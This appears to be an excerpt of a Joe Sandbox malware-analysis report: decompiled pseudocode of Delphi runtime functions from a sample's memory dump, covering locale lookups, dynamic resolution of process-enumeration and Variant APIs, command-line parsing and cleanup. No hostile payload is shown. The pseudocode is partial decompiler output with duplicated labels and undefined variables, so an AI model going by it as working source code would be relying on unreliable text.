    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040B2B4, Relevance: 3.0, APIs: 2, Instructions: 37
    C-Code - Quality: 46%
    			E0040B2B4(int __eax, void* __ebx, void* __eflags) {
				char _v11;
				char _v16;
				intOrPtr _t28;
				void* _t31;
				void* _t33;

				_t33 = __eflags;
				_v16 = 0;
				_push(_t31);
				_push(0x40b318);
				_push( *[fs:edx]);
				 *[fs:edx] = _t31 + 0xfffffff4;
				GetLocaleInfoA(__eax, 0x1004,  &_v11, 7);
				E004040F8( &_v16, 7,  &_v11);
				_push(_v16);
				E00407174(7, GetACP(), _t33);
				_pop(_t28);
				 *[fs:eax] = _t28;
				_push(E0040B31F);
				return E00403E88( &_v16);
			}








    0x0040b2b4
    0x0040b2bd
    0x0040b2c2
    0x0040b2c3
    0x0040b2c8
    0x0040b2cb
    0x0040b2da
    0x0040b2ea
    0x0040b2f2
    0x0040b2fb
    0x0040b304
    0x0040b307
    0x0040b30a
    0x0040b317

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,0040B318), ref: 0040B2DA
    • GetACP.KERNEL32(?,?,00001004,?,00000007,00000000,0040B318), ref: 0040B2F3
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040587A, Relevance: 1.5, APIs: 1, Instructions: 38
    C-Code - Quality: 51%
    			E0040587A(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040587C, Relevance: 1.5, APIs: 1, Instructions: 37
    C-Code - Quality: 51%
    			E0040587C(int __eax, void* __ebx, void* __eflags) {
				char _v8;
				char _v15;
				char _v20;
				intOrPtr _t29;
				void* _t32;

				_v20 = 0;
				_push(_t32);
				_push(0x4058e2);
				_push( *[fs:edx]);
				 *[fs:edx] = _t32 + 0xfffffff0;
				GetLocaleInfoA(__eax, 0x1004,  &_v15, 7);
				E004040F8( &_v20, 7,  &_v15);
				E00402B80(_v20,  &_v8);
				if(_v8 != 0) {
				}
				_pop(_t29);
				 *[fs:eax] = _t29;
				_push(E004058E9);
				return E00403E88( &_v20);
			}








    0x00405885
    0x0040588a
    0x0040588b
    0x00405890
    0x00405893
    0x004058a2
    0x004058b2
    0x004058bd
    0x004058c8
    0x004058c8
    0x004058ce
    0x004058d1
    0x004058d4
    0x004058e1

    APIs
    • GetLocaleInfoA.KERNEL32(?,00001004,?,00000007,00000000,004058E2), ref: 004058A2
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00409DB0, Relevance: 1.5, APIs: 1, Instructions: 29
    C-Code - Quality: 100%
    			E00409DB0(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				if(GetLocaleInfoA(__eax, __edx,  &_v260, 0x100) <= 0) {
					return E00403EDC(_t10, _t18);
				}
				return E00403F78(_t10, _t5 - 1,  &_v260);
			}






    0x00409dbb
    0x00409dbd
    0x00409dd5
    0x00000000
    0x00409ded
    0x00000000

    APIs
    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 00409DCE
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00409DFC, Relevance: 1.5, APIs: 1, Instructions: 23
    C-Code - Quality: 79%
    			E00409DFC(int __eax, char __ecx, int __edx) {
				char _v16;
				char _t5;
				char _t6;

				_push(__ecx);
				_t6 = __ecx;
				if(GetLocaleInfoA(__eax, __edx,  &_v16, 2) <= 0) {
					_t5 = _t6;
				} else {
					_t5 = _v16;
				}
				return _t5;
			}






    0x00409dff
    0x00409e00
    0x00409e16
    0x00409e1d
    0x00409e18
    0x00409e18
    0x00409e18
    0x00409e23

    APIs
    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,0040B5C6,00000000,0040B7DF,?,?,00000000,00000000), ref: 00409E0F
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00417A70, Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99
    C-Code - Quality: 100%
    			E00417A70() {

				if( *0x454a18 == 0) {
					 *0x454a18 = GetModuleHandleA("kernel32.dll");
					if( *0x454a18 != 0) {
						 *0x454a1c = GetProcAddress( *0x454a18, "CreateToolhelp32Snapshot");
						 *0x454a20 = GetProcAddress( *0x454a18, "Heap32ListFirst");
						 *0x454a24 = GetProcAddress( *0x454a18, "Heap32ListNext");
						 *0x454a28 = GetProcAddress( *0x454a18, "Heap32First");
						 *0x454a2c = GetProcAddress( *0x454a18, "Heap32Next");
						 *0x454a30 = GetProcAddress( *0x454a18, "Toolhelp32ReadProcessMemory");
						 *0x454a34 = GetProcAddress( *0x454a18, "Process32First");
						 *0x454a38 = GetProcAddress( *0x454a18, "Process32Next");
						 *0x454a3c = GetProcAddress( *0x454a18, "Process32FirstW");
						 *0x454a40 = GetProcAddress( *0x454a18, "Process32NextW");
						 *0x454a44 = GetProcAddress( *0x454a18, "Thread32First");
						 *0x454a48 = GetProcAddress( *0x454a18, "Thread32Next");
						 *0x454a4c = GetProcAddress( *0x454a18, "Module32First");
						 *0x454a50 = GetProcAddress( *0x454a18, "Module32Next");
						 *0x454a54 = GetProcAddress( *0x454a18, "Module32FirstW");
						 *0x454a58 = GetProcAddress( *0x454a18, "Module32NextW");
					}
				}
				if( *0x454a18 == 0 ||  *0x454a1c == 0) {
					return 0;
				} else {
					return 1;
				}
			}



    0x00417a79
    0x00417a89
    0x00417a8e
    0x00417aa1
    0x00417ab3
    0x00417ac5
    0x00417ad7
    0x00417ae9
    0x00417afb
    0x00417b0d
    0x00417b1f
    0x00417b31
    0x00417b43
    0x00417b55
    0x00417b67
    0x00417b79
    0x00417b8b
    0x00417b9d
    0x00417baf
    0x00417baf
    0x00417a8e
    0x00417bb7
    0x00417bc5
    0x00417bc6
    0x00417bc9
    0x00417bc9

    APIs
    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2,00000000,004183DD), ref: 00417A84
    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389,?,?,?,?,?,004183C2), ref: 00417A9C
    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AAE
    • GetProcAddress.KERNEL32(00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AC0
    • GetProcAddress.KERNEL32(00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7,00000000,00418389), ref: 00417AD2
    • GetProcAddress.KERNEL32(00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000,?,004182A7), ref: 00417AE4
    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002,00417CF7,00000000), ref: 00417AF6
    • GetProcAddress.KERNEL32(00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot,kernel32.dll,00000002), ref: 00417B08
    • GetProcAddress.KERNEL32(00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst,00000000,CreateToolhelp32Snapshot), ref: 00417B1A
    • GetProcAddress.KERNEL32(00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext,00000000,Heap32ListFirst), ref: 00417B2C
    • GetProcAddress.KERNEL32(00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First,00000000,Heap32ListNext), ref: 00417B3E
    • GetProcAddress.KERNEL32(00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next,00000000,Heap32First), ref: 00417B50
    • GetProcAddress.KERNEL32(00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory,00000000,Heap32Next), ref: 00417B62
    • GetProcAddress.KERNEL32(00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First,00000000,Toolhelp32ReadProcessMemory), ref: 00417B74
    • GetProcAddress.KERNEL32(00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next,00000000,Process32First), ref: 00417B86
    • GetProcAddress.KERNEL32(00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW,00000000,Process32Next), ref: 00417B98
    • GetProcAddress.KERNEL32(00000000,Module32NextW,00000000,Module32FirstW,00000000,Module32Next,00000000,Module32First,00000000,Thread32Next,00000000,Thread32First,00000000,Process32NextW,00000000,Process32FirstW), ref: 00417BAA
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040CA40, Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141
    C-Code - Quality: 100%
    			E0040CA40() {
				struct HINSTANCE__* _v8;
				intOrPtr _t46;
				void* _t91;

				_v8 = GetModuleHandleA("oleaut32.dll");
				 *0x4547a0 = E0040CA14("VariantChangeTypeEx", E0040C5B0, _t91);
				 *0x4547a4 = E0040CA14("VarNeg", E0040C5E0, _t91);
				 *0x4547a8 = E0040CA14("VarNot", E0040C5E0, _t91);
				 *0x4547ac = E0040CA14("VarAdd", E0040C5EC, _t91);
				 *0x4547b0 = E0040CA14("VarSub", E0040C5EC, _t91);
				 *0x4547b4 = E0040CA14("VarMul", E0040C5EC, _t91);
				 *0x4547b8 = E0040CA14("VarDiv", E0040C5EC, _t91);
				 *0x4547bc = E0040CA14("VarIdiv", E0040C5EC, _t91);
				 *0x4547c0 = E0040CA14("VarMod", E0040C5EC, _t91);
				 *0x4547c4 = E0040CA14("VarAnd", E0040C5EC, _t91);
				 *0x4547c8 = E0040CA14("VarOr", E0040C5EC, _t91);
				 *0x4547cc = E0040CA14("VarXor", E0040C5EC, _t91);
				 *0x4547d0 = E0040CA14("VarCmp", E0040C5F8, _t91);
				 *0x4547d4 = E0040CA14("VarI4FromStr", E0040C604, _t91);
				 *0x4547d8 = E0040CA14("VarR4FromStr", E0040C670, _t91);
				 *0x4547dc = E0040CA14("VarR8FromStr", E0040C6DC, _t91);
				 *0x4547e0 = E0040CA14("VarDateFromStr", E0040C748, _t91);
				 *0x4547e4 = E0040CA14("VarCyFromStr", E0040C7B4, _t91);
				 *0x4547e8 = E0040CA14("VarBoolFromStr", E0040C820, _t91);
				 *0x4547ec = E0040CA14("VarBstrFromCy", E0040C8A0, _t91);
				 *0x4547f0 = E0040CA14("VarBstrFromDate", E0040C910, _t91);
				_t46 = E0040CA14("VarBstrFromBool", E0040C980, _t91);
				 *0x4547f4 = _t46;
				return _t46;
			}






    0x0040ca4e
    0x0040ca62
    0x0040ca78
    0x0040ca8e
    0x0040caa4
    0x0040caba
    0x0040cad0
    0x0040cae6
    0x0040cafc
    0x0040cb12
    0x0040cb28
    0x0040cb3e
    0x0040cb54
    0x0040cb6a
    0x0040cb80
    0x0040cb96
    0x0040cbac
    0x0040cbc2
    0x0040cbd8
    0x0040cbee
    0x0040cc04
    0x0040cc1a
    0x0040cc2a
    0x0040cc30
    0x0040cc37

    APIs
    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 0040CA49
      • Part of subcall function 0040CA14: GetProcAddress.KERNEL32(00000000), ref: 0040CA2D
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00402858, Relevance: 16.6, APIs: 9, Strings: 2, Instructions: 109
    C-Code - Quality: 100%
    			E00402858(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00404478(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















    0x0040285c
    0x0040285e
    0x0040286a
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x0040286a
    0x0040286a
    0x0040286e
    0x00402868
    0x00402868
    0x00402874
    0x00402877
    0x00402884
    0x00402886
    0x004028cd
    0x004028cd
    0x004028d1
    0x00000000
    0x00000000
    0x0040288c
    0x004028c0
    0x004028c9
    0x004028cb
    0x00000000
    0x004028cb
    0x00402894
    0x004028a6
    0x004028a6
    0x004028aa
    0x00000000
    0x00000000
    0x00402899
    0x004028a2
    0x004028a4
    0x004028a4
    0x004028b3
    0x004028bb
    0x004028bb
    0x004028b3
    0x004028d7
    0x004028dc
    0x004028de
    0x004028e0
    0x00402935
    0x00402935
    0x00402939
    0x00000000
    0x00000000
    0x004028e6
    0x00402921
    0x00402928
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x0040292a
    0x0040292a
    0x0040292c
    0x0040292f
    0x00402930
    0x00402931
    0x00000000
    0x0040292a
    0x004028ee
    0x00402907
    0x00402907
    0x0040290b
    0x00000000
    0x00000000
    0x004028f3
    0x004028fa
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x004028fc
    0x004028fc
    0x004028fe
    0x00402901
    0x00402902
    0x00402903
    0x004028fc
    0x00402914
    0x0040291c
    0x0040291c
    0x00402914
    0x00402941
    0x0040287f
    0x0040287f
    0x00000000
    0x0040287f
    0x00402877

    APIs
    • CharNextA.USER32(00000000), ref: 00402863
    • CharNextA.USER32(00000000), ref: 0040288F
    • CharNextA.USER32(00000000), ref: 00402899
    • CharNextA.USER32(00000000), ref: 004028B6
    • CharNextA.USER32(00000000), ref: 004028C0
    • CharNextA.USER32(00000000), ref: 004028E9
    • CharNextA.USER32(00000000), ref: 004028F3
    • CharNextA.USER32(00000000), ref: 00402917
    • CharNextA.USER32(00000000), ref: 00402921
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040A4A4, Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 56
    C-Code - Quality: 100%
    			E0040A4A4(void* __edx, void* __edi, void* __fp0) {
				void _v1024;
				char _v1088;
				long _v1092;
				void* _t12;
				char* _t14;
				intOrPtr _t16;
				intOrPtr _t18;
				intOrPtr _t24;
				long _t32;

				E0040A31C(_t12,  &_v1024, __edx, __fp0, 0x400);
				_t14 =  *0x45308c; // 0x454044
				if( *_t14 == 0) {
					_t16 =  *0x452f6c; // 0x405f30
					_t9 = _t16 + 4; // 0xffe9
					_t18 =  *0x454660; // 0x400000
					LoadStringA(E00404DCC(_t18),  *_t9,  &_v1088, 0x40);
					return MessageBoxA(0,  &_v1024,  &_v1088, 0x2010);
				}
				_t24 =  *0x452f90; // 0x454214
				E00402784(E00402A8C(_t24));
				CharToOemA( &_v1024,  &_v1024);
				_t32 = E00407764( &_v1024, __edi);
				WriteFile(GetStdHandle(0xfffffff4),  &_v1024, _t32,  &_v1092, 0);
				return WriteFile(GetStdHandle(0xfffffff4), 0x40a568, 2,  &_v1092, 0);
			}












    0x0040a4b3
    0x0040a4b8
    0x0040a4c0
    0x0040a527
    0x0040a52c
    0x0040a530
    0x0040a53b
    0x00000000
    0x0040a551
    0x0040a4c2
    0x0040a4cc
    0x0040a4db
    0x0040a4eb
    0x0040a4fe
    0x00000000

    APIs
      • Part of subcall function 0040A31C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040A339
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040A35D
      • Part of subcall function 0040A31C: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040A378
      • Part of subcall function 0040A31C: LoadStringA.USER32(00000000,0000FFE8,?,00000100), ref: 0040A40E
    • CharToOemA.USER32(?,?), ref: 0040A4DB
    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 0040A4F8
    • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?), ref: 0040A4FE
    • GetStdHandle.KERNEL32(000000F4,0040A568,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 0040A513
    • WriteFile.KERNEL32(00000000,000000F4,0040A568,00000002,?), ref: 0040A519
    • LoadStringA.USER32(00000000,0000FFE9,?,00000040), ref: 0040A53B
    • MessageBoxA.USER32(00000000,?,?,00002010), ref: 0040A551
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 00401A74, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62
    C-Code - Quality: 72%
    			E00401A74() {
				void* _t2;
				void* _t3;
				void* _t14;
				intOrPtr* _t19;
				intOrPtr _t23;
				intOrPtr _t26;
				intOrPtr _t28;

				_t26 = _t28;
				if( *0x4545bc == 0) {
					return _t2;
				} else {
					_push(_t26);
					_push(E00401B4A);
					_push( *[fs:edx]);
					 *[fs:edx] = _t28;
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L0040130C();
					}
					 *0x4545bc = 0;
					_t3 =  *0x45461c; // 0x0
					LocalFree(_t3);
					 *0x45461c = 0;
					_t19 =  *0x4545e4; // 0x4545e4
					while(_t19 != 0x4545e4) {
						_t1 = _t19 + 8; // 0x0
						VirtualFree( *_t1, 0, 0x8000);
						_t19 =  *_t19;
					}
					E00401374(0x4545e4);
					E00401374(0x4545f4);
					E00401374(0x454620);
					_t14 =  *0x4545dc; // 0x0
					while(_t14 != 0) {
						 *0x4545dc =  *_t14;
						LocalFree(_t14);
						_t14 =  *0x4545dc; // 0x0
					}
					_pop(_t23);
					 *[fs:eax] = _t23;
					_push(0x401b51);
					if( *0x454045 != 0) {
						_push(0x4545c4);
						L00401314();
					}
					_push(0x4545c4);
					L0040131C();
					return 0;
				}
			}










    0x00401a75
    0x00401a7f
    0x00401b53
    0x00401a85
    0x00401a87
    0x00401a88
    0x00401a8d
    0x00401a90
    0x00401a9a
    0x00401a9c
    0x00401aa1
    0x00401aa1
    0x00401aa6
    0x00401aad
    0x00401ab3
    0x00401aba
    0x00401abf
    0x00401ad9
    0x00401ace
    0x00401ad2
    0x00401ad7
    0x00401ad7
    0x00401ae6
    0x00401af0
    0x00401afa
    0x00401aff
    0x00401b06
    0x00401b0a
    0x00401b11
    0x00401b16
    0x00401b1b
    0x00401b21
    0x00401b24
    0x00401b27
    0x00401b33
    0x00401b35
    0x00401b3a
    0x00401b3a
    0x00401b3f
    0x00401b44
    0x00401b49
    0x00401b49

    APIs
    • RtlEnterCriticalSection.KERNEL32(004545C4,00000000,00401B4A), ref: 00401AA1
    • LocalFree.KERNEL32(00000000,00000000,00401B4A), ref: 00401AB3
    • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401AD2
    • LocalFree.KERNEL32(00000000,00000000,00000000,00008000,00000000,00000000,00401B4A), ref: 00401B11
    • RtlLeaveCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B3A
    • RtlDeleteCriticalSection.KERNEL32(004545C4,00401B51,00000000,00000000,00401B4A), ref: 00401B44
    Strings
    Memory Dump Source
    • Source File: 0000000A.00000002.1501156262.00400000.00000040.sdmp, Offset: 00400000, based on PE: true
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_10_2_400000_obtG43AWHP.jbxd
    Function 0040B514, Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201
    C-Code - Quality: 72%
    			E0040B514(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40b7df);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040B3A0();
				E00409E60(__ebx, __edi, __esi);
				_t196 =  *0x454744;
				if( *0x454744 != 0) {
					E0040A038(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E00409DB0(_t43, 0, 0x14,  &_v20);
				E00403EDC(0x454678, _v20);
				E00409DB0(_t43, 0x40b7f4, 0x1b,  &_v24);
				 *0x45467c = E00407174(0x40b7f4, 0, _t196);
				E00409DB0(_t132, 0x40b7f4, 0x1c,  &_v28);
				 *0x45467d = E00407174(0x40b7f4, 0, _t196);
				 *0x45467e = E00409DFC(_t132, 0x2c, 0xf);
				 *0x45467f = E00409DFC(_t132, 0x2e, 0xe);
				E00409DB0(_t132, 0x40b7f4, 0x19,  &_v32);
				 *0x454680 = E00407174(0x40b7f4, 0, _t196);
				 *0x454681 = E00409DFC(_t132, 0x2f, 0x1d);
				E00409DB0(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040A0E8(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00403EDC(0x454684, _v36);
				E00409DB0(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040A0E8(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00403EDC(0x454688, _v44);
				 *0x45468c = E00409DFC(_t132, 0x3a, 0x1e);
				E00409DB0(_t132, 0x40b828, 0x28,  &_v52);
				E00403EDC(0x454690, _v52);
				E00409DB0(_t132, 0x40b834, 0x29,  &_v56);
				E00403EDC(0x454694, _v56);
				E00403E88( &_v12);
				E00403E88( &_v16);
				E00409DB0(_t132, 0x40b7f4, 0x25,  &_v60);
				_t104 = E00407174(0x40b7f4, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00403F20( &_v8, 0x40b84c);
				} else {
					E00403F20( &_v8, 0x40b840);
				}
				E00409DB0(_t132, 0x40b7f4, 0x23,  &_v64);
				_t111 = E00407174(0x40b7f4, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E00409DB0(_t132, 0x40b7f4, 0x1005,  &_v68);
					if(E00407174(0x40b7f4, 0, _t198) != 0) {
						E00403F20( &_v12, 0x40b868);
					} else {
						E00403F20( &_v16, 0x40b858);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404208();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404208();
				 *0x454746 = E00409DFC(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040B7E6);
				return E00403EAC( &_v68, 0x10);
			}

























    0x0040b514
    0x0040b514
    0x0040b515
    0x0040b517
    0x0040b51c
    0x0040b51c
    0x0040b51e
    0x0040b520
    0x0040b520
    0x0040b523
    0x0040b526
    0x0040b527
    0x0040b52c
    0x0040b52f
    0x0040b532
    0x0040b537
    0x0040b53c
    0x0040b543
    0x0040b545
    0x0040b545
    0x0040b54f
    0x0040b55e
    0x0040b56b
    0x0040b580
    0x0040b58f
    0x0040b5a4
    0x0040b5b3
    0x0040b5c6
    0x0040b5d9
    0x0040b5ee
    0x0040b5fd
    0x0040b610
    0x0040b625
    0x0040b630
    0x0040b63d
    0x0040b652
    0x0040b65d
    0x0040b66a
    0x0040b67d
    0x0040b692
    0x0040b69f
    0x0040b6b4
    0x0040b6c1
    0x0040b6c9
    0x0040b6d1
    0x0040b6e6
    0x0040b6f0
    0x0040b6f5
    0x0040b6f7
    0x0040b710
    0x0040b6f9
    0x0040b701
    0x0040b701
    0x0040b725
    0x0040b72f
    0x0040b734
    0x0040b736
    0x0040b748
    0x0040b759
    0x0040b772
    0x0040b75b
    0x0040b763
    0x0040b763
    0x0040b759
    0x0040b777
    0x0040b77a
    0x0040b77d
    0x0040b782
    0x0040b78f
    0x0040b794
    0x0040b797
    0x0040b79a
    0x0040b79f
    0x0040b7ac
    0x0040b7bf
    0x0040b7c6
    0x0040b7c9
    0x0040b7cc
    0x0040b7de

    APIs
      • Part of subcall function 0040B3A0: GetThreadLocale.KERNEL32 ref: 0040B3CA
      • Part of subcall function 0040B3A0: GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040B494
      • Part of subcall function 0040B3A0: GetSystemMetrics.USER32(0000004A), ref: 0040B4BF
